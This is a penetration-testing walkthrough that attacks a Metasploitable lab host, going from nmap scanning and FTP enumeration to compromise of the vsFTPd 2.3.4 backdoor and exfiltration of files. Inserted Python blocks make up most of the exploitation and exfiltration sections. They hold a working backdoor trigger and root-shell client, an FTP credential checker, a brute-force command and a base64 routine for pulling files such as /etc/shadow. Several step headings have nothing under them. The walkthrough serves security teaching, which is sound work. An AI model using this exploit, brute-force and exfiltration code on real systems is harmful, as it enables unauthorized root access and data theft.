FTP Enumeration to Exploitation (vsFTPd 2.3.4)
Overview¶
This document presents a complete penetration testing walkthrough against a vulnerable system (Metasploitable). The objective is to demonstrate how an attacker can progress from basic reconnaissance to full system compromise and data exfiltration by combining multiple weaknesses.
Unlike isolated vulnerabilities, real-world attacks rely on chaining:
- Misconfigurations
- Weak authentication
- Outdated software
This walkthrough follows a structured methodology:
- Reconnaissance and service discovery
- Service-specific enumeration (FTP)
- Misconfiguration analysis
- Credential testing
- Vulnerability identification
- Exploitation
- Post-exploitation
- Data exfiltration
Target Information¶
- Target IP: 192.168.29.157
- Environment: Metasploitable (intentionally vulnerable Linux system)
- Primary Focus: FTP service (Port 21)
1. Reconnaissance and Service Discovery¶
The first phase aims to identify all externally exposed services and understand the system’s attack surface.
Explanation¶
- -sS: TCP SYN (half-open) scan; the handshake is never completed, so the service itself usually does not log the probe, although any network IDS still sees it
- -T3: the default (normal) timing template, a balance between speed and reliability
- -sV: service and version detection, which is what produces the version strings used in the next phase
Findings¶
- 21/tcp → FTP (vsFTPd 2.3.4)
- 22/tcp → SSH
- 80/tcp → HTTP
- 139/445 → SMB
- Additional services (databases, RPC, etc.)
Analysis¶
The system exposes multiple services, indicating poor hardening. A large attack surface increases the likelihood of exploitable weaknesses.
From a prioritization perspective:
- Services with known vulnerabilities are targeted first
- FTP stands out due to version disclosure
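The prioritisation described above can be automated from the scan's greppable output. The following is an added example for this walkthrough, not code from the original page: it parses the `-oG` format that the scan produces when run as `nmap -sS -T3 -sV -oG scan.gnmap 192.168.29.157` and ranks open ports so that services leaking an exact version come first. The sample output is constructed from the Findings list; only the port 21 product string comes from the page, the other product strings are placeholders chosen to exercise the three tiers.

```python
import re

# Constructed sample of nmap greppable output (-oG), shaped on the Findings
# list. Only "vsftpd 2.3.4" on port 21 is from the walkthrough; the other
# product strings are placeholders, not scan results.
SAMPLE_GNMAP = (
    "Host: 192.168.29.157 ()\tPorts: "
    "21/open/tcp//ftp//vsftpd 2.3.4/, "
    "22/open/tcp//ssh//OpenSSH/, "
    "80/open/tcp//http//Apache httpd/, "
    "139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, "
    "445/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, "
    "3306/open/tcp//mysql///, "
    "5432/open/tcp//postgresql//PostgreSQL DB 8.3/\t"
    "Ignored State: closed (993)\n"
)

# -oG port entries: port/state/protocol/owner/service/rpc-info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")
# An exact version looks like "2.3.4" or "8.3"; "3.X - 4.X" deliberately does not count.
VERSION_RE = re.compile(r"\b\d+(\.\d+)+")


def parse_gnmap(text):
    """Return one dict per open port found in greppable nmap output."""
    services = []
    for line in text.splitlines():
        if "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, _owner, service, _rpc, product = m.groups()
            if state != "open":
                continue
            product = product.strip()
            services.append({"host": host, "port": int(port), "proto": proto,
                             "service": service, "product": product,
                             "has_version": bool(VERSION_RE.search(product))})
    return services


def prioritise(services):
    """Order for manual follow-up: exact version string first (it can be
    matched against exploit databases directly), product name only second,
    unidentified services last; lower ports first within a tier."""
    def tier(s):
        if s["has_version"]:
            return 0
        return 1 if s["product"] else 2
    return sorted(services, key=lambda s: (tier(s), s["port"]))


if __name__ == "__main__":
    for s in prioritise(parse_gnmap(SAMPLE_GNMAP)):
        flag = "VERSION" if s["has_version"] else ("product" if s["product"] else "unknown")
        print(f'{s["port"]:>5}/{s["proto"]}  {s["service"]:<12} {flag:<8} {s["product"]}')
```

Run against a real `scan.gnmap` by reading the file into `parse_gnmap`; the ranking puts the FTP service at the top for the same reason the analysis does: it is the one entry whose version can be looked up verbatim.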
2. FTP Enumeration¶
2.1 Version Detection¶
Result¶
Analysis¶
Version detection is critical because:
- It allows mapping the service to known vulnerabilities
- Public exploit databases often index vulnerabilities by version
The identified version is significant: CVE-2011-2523 covers a backdoor that was inserted into the vsFTPd 2.3.4 source tarball on the project's download site in mid-2011 and gives an unauthenticated remote attacker a command shell. One caveat: only builds made from the trojaned tarball carry it, so the banner alone is not proof. The finding has to be confirmed by triggering the backdoor (Section 6).
2.2 Anonymous Login Check¶
Result¶
Explanation¶
- FTP servers sometimes allow anonymous access for public file sharing
- In secure environments, this is usually restricted or disabled
Security Impact¶
- Unauthorized users can access the service
- Potential exposure of sensitive files
- May allow file upload/download depending on configuration
3. Manual FTP Verification¶
Automated scans must always be validated manually.
Log in using:
Observations¶
- Authentication successful
- Directory listing shows no files
- Navigation to other directories is restricted
Interpretation¶
This indicates:
- Anonymous access is enabled
- Permissions are limited (likely read-only or sandboxed)
Important Concept¶
Access does not always equal exploitability. Even when login is possible, permissions determine the actual impact.
4. Credential Bruteforce¶
To test authentication strength, credential brute-forcing is performed.
nmap --script ftp-brute \
--script-args userdb=/usr/share/wordlists/metasploit/unix_users.txt,passdb=/usr/share/wordlists/rockyou.txt \
-p 21 192.168.29.157
Explanation¶
- userdb and passdb select the username and password wordlists; the script tries each pair against the FTP login and reports the ones the server accepts (a 230 reply)
- A 14-million-line list such as rockyou.txt multiplied by every username is not practical against an FTP login loop. The three hits below are all username-as-password pairs, which nmap's brute library tries on its own (brute.useraspass defaults to true), so a short list of defaults and usernames finds them quickly and keeps the noise in the server log down
Results¶
- ftp:ftp
- user:user
- postgres:postgres
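The manual verification in Section 3 and the credential check in this section can be done in one pass with Python's ftplib, which also settles the question raised in Section 3 of what a login actually permits. This is an added example for this walkthrough, not code from the original page. It assumes the lab target address, the credential pairs listed above plus the anonymous account, and a write probe that creates and immediately removes one directory; the FakeFTP class at the bottom is a constructed stand-in mimicking the observed behaviour so the logic can be exercised offline.

```python
from ftplib import FTP, error_perm

TARGET = "192.168.29.157"          # lab target from the walkthrough
# The ftp-brute results from this section plus the anonymous account.
CANDIDATES = [("anonymous", "anonymous@example.com"), ("ftp", "ftp"),
              ("user", "user"), ("postgres", "postgres")]


def assess_login(ftp, user, password):
    """Try one login on an already-connected FTP object.

    Returns None when the server rejects the pair (530), otherwise a dict
    describing what the session can do: the visible listing and whether
    a directory can be created. The write probe cleans up after itself."""
    try:
        ftp.login(user, password)
    except error_perm:             # 530 Login incorrect
        return None
    result = {"user": user, "files": [], "writable": False}
    try:
        result["files"] = ftp.nlst()
    except error_perm:
        pass                       # login works but listing is denied
    probe = "pentest_write_probe"  # name chosen for this example
    try:
        ftp.mkd(probe)             # 550 here means read-only or sandboxed
        result["writable"] = True
        ftp.rmd(probe)             # never leave artefacts on the target
    except error_perm:
        pass
    return result


def check_target(connect, candidates=CANDIDATES):
    """connect() must return a fresh, connected FTP-like object; one
    session per credential avoids 'already logged in' state leaking
    between attempts. Returns the outcomes for every accepted pair."""
    hits = []
    for user, password in candidates:
        ftp = connect()
        try:
            outcome = assess_login(ftp, user, password)
        finally:
            try:
                ftp.quit()
            except Exception:      # server may drop us after a bad login
                pass
        if outcome is not None:
            hits.append(outcome)
    return hits


def connect_live(host=TARGET, port=21):
    ftp = FTP()
    ftp.connect(host, port, timeout=5)
    return ftp


class FakeFTP:
    """Constructed stand-in (not a real server) reproducing what the
    walkthrough observed: anonymous and the three weak accounts log in,
    anonymous sees an empty directory and cannot write, 'user' can."""
    ACCOUNTS = {"anonymous": None, "ftp": "ftp", "user": "user", "postgres": "postgres"}

    def __init__(self):
        self.user = None

    def login(self, user, password):
        expected = self.ACCOUNTS.get(user, "")
        if user not in self.ACCOUNTS or (expected is not None and expected != password):
            raise error_perm("530 Login incorrect.")
        self.user = user

    def nlst(self):
        return [] if self.user == "anonymous" else [".profile"]

    def mkd(self, name):
        if self.user != "user":
            raise error_perm("550 Create directory operation failed.")

    def rmd(self, name):
        pass

    def quit(self):
        pass


if __name__ == "__main__":
    for hit in check_target(connect_live):
        print(hit)
```

The `writable` flag is the point of the exercise: two accounts that both "log in successfully" can have very different impact, and the probe separates a sandboxed read-only login from one that can plant files.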
Analysis¶
These credentials indicate:
- Default or weak passwords
- Poor credential management
Security Risk¶
- Unauthorized access
- Potential privilege escalation
- Reuse of credentials across services
5. Vulnerability Identification¶
At this stage, multiple findings are correlated:
| Finding | Type | Impact |
|---|---|---|
| Anonymous login | Misconfiguration | Unauthorized access |
| Weak credentials | Authentication flaw | Easy compromise |
| vsFTPd 2.3.4 | Software vulnerability | Remote code execution |
Key Insight¶
Each issue alone may not be critical. However, when combined, they significantly increase the attack impact.
This is a fundamental principle in penetration testing:
The severity of a compromise is determined by how vulnerabilities interact, not only by each flaw in isolation.
6. Exploitation¶
The identified vulnerability (vsFTPd 2.3.4 backdoor) is exploited using Metasploit.
Step 1: Start Metasploit¶
Step 2: Search for Exploit¶
Step 3: Select Module¶
Step 4: Configure Target¶
Step 5: Execute Exploit¶
Result¶
- Backdoor connection established
- Remote shell obtained
Explanation¶
The affected build contains a backdoor rather than a conventional memory-safety bug: the vsFTPd 2.3.4 source tarball on the project's download site was replaced with a trojaned copy for a few days in mid-2011 (CVE-2011-2523). When the trojaned daemon receives a USER command whose value contains the two characters ":)", it binds TCP port 6200 and hands anyone who connects a /bin/sh running with the daemon's privileges, which at that point of the login are root. No password is checked and no memory corruption is involved, which is why the exploit is reliable. A clean build answers the same login with an ordinary 331 and 530 and opens nothing, so if nothing listens on port 6200 after the trigger, the version string was a false positive.
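Steps 1 to 5 above correspond to `msfconsole`, `search vsftpd`, `use exploit/unix/ftp/vsftpd_234_backdoor`, `set RHOSTS 192.168.29.157` and `run`. The following is an added example for this walkthrough that performs the same trigger by hand, so the mechanism is visible; it is not Metasploit's module and not code from the original page. The trigger string, port 6200 and the root shell are the documented behaviour of the trojaned tarball; the lab address is the walkthrough's. FakeBackdooredFtpd is a constructed stand-in with made-up responses so the client can be exercised offline on loopback.

```python
import socket
import threading
import time

TARGET = "192.168.29.157"   # lab target from the walkthrough
FTP_PORT = 21
SHELL_PORT = 6200           # port the trojaned daemon binds once triggered


def trigger_backdoor(host, ftp_port=FTP_PORT, timeout=5.0):
    """Send a USER value containing ':)'; that substring is the trigger.
    Returns the banner so the caller can log the advertised version."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as s:
        banner = s.recv(1024).decode(errors="replace").strip()
        s.sendall(b"USER letmein:)\r\n")
        s.sendall(b"PASS anything\r\n")
        try:
            s.recv(1024)            # a trojaned daemon blocks in accept() on
        except socket.timeout:      # 6200 and never answers; a clean one
            pass                    # replies 331/530
    return banner


def run_command(host, cmd, shell_port=SHELL_PORT, timeout=3.0):
    """Send one command to the spawned shell and return what comes back
    before the socket closes or the read times out (the shell prints no
    prompt, so a timeout is the only end-of-output signal)."""
    with socket.create_connection((host, shell_port), timeout=timeout) as s:
        s.sendall(cmd.encode() + b"\n")
        out = b""
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            out += chunk
    return out.decode(errors="replace")


def exploit(host, ftp_port=FTP_PORT, shell_port=SHELL_PORT, retries=5):
    """Full chain: trigger, wait for the listener, run id, report.
    Returns (is_root, banner, id_output); is_root is False when nothing
    listens on the shell port, i.e. the banner came from a clean build."""
    banner = trigger_backdoor(host, ftp_port)
    for _ in range(retries):
        try:
            id_out = run_command(host, "id", shell_port)
            break
        except OSError:             # refused/reset: not bound (yet)
            time.sleep(1)
    else:
        return False, banner, ""
    return id_out.startswith("uid=0("), banner, id_out


class FakeBackdooredFtpd:
    """Constructed stand-in for offline testing only (not vsFTPd). Both
    listeners bind loopback on OS-chosen ports; the 'shell' answers id
    with a root uid only after the FTP side has seen the trigger."""

    def __init__(self):
        self.triggered = False
        self.ftp, self.shell = self._listen(), self._listen()
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell_port = self.shell.getsockname()[1]
        threading.Thread(target=self._serve_ftp, daemon=True).start()
        threading.Thread(target=self._serve_shell, daemon=True).start()

    @staticmethod
    def _listen():
        s = socket.socket()
        s.bind(("127.0.0.1", 0))
        s.listen(5)
        return s

    def _serve_ftp(self):
        while True:
            c, _ = self.ftp.accept()
            with c:
                c.sendall(b"220 (vsFTPd 2.3.4)\r\n")
                login = b""
                while b"PASS" not in login:     # read USER and PASS lines
                    chunk = c.recv(1024)
                    if not chunk:
                        break
                    login += chunk
                if b":)" in login:
                    self.triggered = True
                c.sendall(b"331 Please specify the password.\r\n")

    def _serve_shell(self):
        while True:
            c, _ = self.shell.accept()
            with c:
                cmd = c.recv(1024).strip()
                if self.triggered and cmd == b"id":
                    c.sendall(b"uid=0(root) gid=0(root)\n")


if __name__ == "__main__":
    print(exploit(TARGET))
```

Against a real trojaned daemon the trigger call waits out its timeout because the control connection never gets a reply; that silence, followed by a listener appearing on 6200, is itself the confirmation. The `id` check matters for Section 7: the shell's privilege level is read from its output, not assumed from the exploit name.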
7. Post-Exploitation¶
Once access is obtained, the system is explored to assess impact.
Key Directories¶
- /etc → configuration files and potential credential data (/etc/passwd, /etc/shadow)
- /home → user directories and personal files
- /root → administrative data
Analysis¶
Being able to read /root and /etc/shadow (which only root can open) indicates:
- Root privileges; confirm with id rather than inferring from which paths happen to be readable
- Full system compromise
Post-exploitation focuses on:
- Data discovery
- Privilege escalation (if needed)
- Persistence (not covered in this lab)
8. Data Exfiltration¶
The final stage is extracting sensitive data.
Identified file:
Download:
Explanation¶
Data exfiltration involves transferring files from the compromised system to the attacker’s system.
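Over a bare shell channel such as the one from Section 6, binary files and long outputs are easy to corrupt or truncate. The following is an added example for this walkthrough, not code from the original page: it pulls a file through any `run(cmd) -> str` callable (the backdoor shell, a Metasploit session, ssh with the recovered credentials), base64-encodes on the target so the bytes survive a line-oriented channel, and verifies the byte count on both sides. It assumes the target has a coreutils `base64` and `wc` (Metasploitable's coreutils has both); `run_local` is a constructed stand-in that executes the commands on this machine so the round trip can be tested offline, and the sample content is made up.

```python
import base64
import hashlib
import os
import subprocess
import tempfile


def exfiltrate(run, remote_path):
    """Return the file's bytes plus a check that they arrived intact.

    base64 keeps binary content safe on a text channel, and the remote
    byte count (wc -c) catches truncated reads, which are the usual
    failure mode of a recv loop that stops on a timeout."""
    q = "'" + remote_path.replace("'", "'\\''") + "'"   # quote for sh
    expected = int(run(f"wc -c < {q}").split()[0])
    encoded = "".join(run(f"base64 {q}").split())        # undo line wrapping
    data = base64.b64decode(encoded)
    return {
        "path": remote_path,
        "size": len(data),
        "complete": len(data) == expected,
        "sha256": hashlib.sha256(data).hexdigest(),
        "data": data,
    }


def run_local(cmd):
    """Constructed stand-in for the remote shell: runs cmd with sh here.
    In real use this is replaced by a wrapper around the compromised
    host's shell, e.g. lambda cmd: run_command(TARGET, cmd)."""
    return subprocess.run(["sh", "-c", cmd], capture_output=True,
                          text=True, check=True).stdout


def roundtrip_demo(content=b"root:x:0:0:root:/root:/bin/bash\n\x00\xff"):
    """Write constructed content to a temp file, exfiltrate it through
    run_local, and report (came back byte-for-byte, size)."""
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(content)
        path = tmp.name
    try:
        result = exfiltrate(run_local, path)
    finally:
        os.unlink(path)
    return result["complete"] and result["data"] == content, result["size"]


if __name__ == "__main__":
    print(roundtrip_demo())
```

Record the SHA-256 alongside the file in the engagement notes: it is what lets the client confirm later which exact copy of the data left the system.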
Real-World Targets¶
- Credentials and password files
- Databases
- Internal documents
- Configuration files
Importance¶
This step represents the primary objective of most attacks:
Access is only valuable if data can be extracted.
9. Key Concepts and Learnings¶
- Enumeration is the foundation of penetration testing
- Version detection enables targeted exploitation
- Misconfigurations often provide initial entry points
- Weak credentials significantly increase attack success
- Exploitation is a transition phase, not the final goal
- Data exfiltration defines the real impact of a compromise
10. Conclusion¶
This walkthrough demonstrates a realistic attack chain:
- Discover exposed services
- Identify weak configurations
- Correlate vulnerabilities
- Exploit known weaknesses
- Gain system access
- Extract sensitive data
It highlights how multiple small issues can be combined to achieve full system compromise.
Understanding this process is essential for:
- Penetration testers (offensive security)
- System administrators (defensive security)
Disclaimer¶
This content is intended for educational purposes only. All activities were performed in a controlled lab environment. Unauthorized testing on real systems is illegal.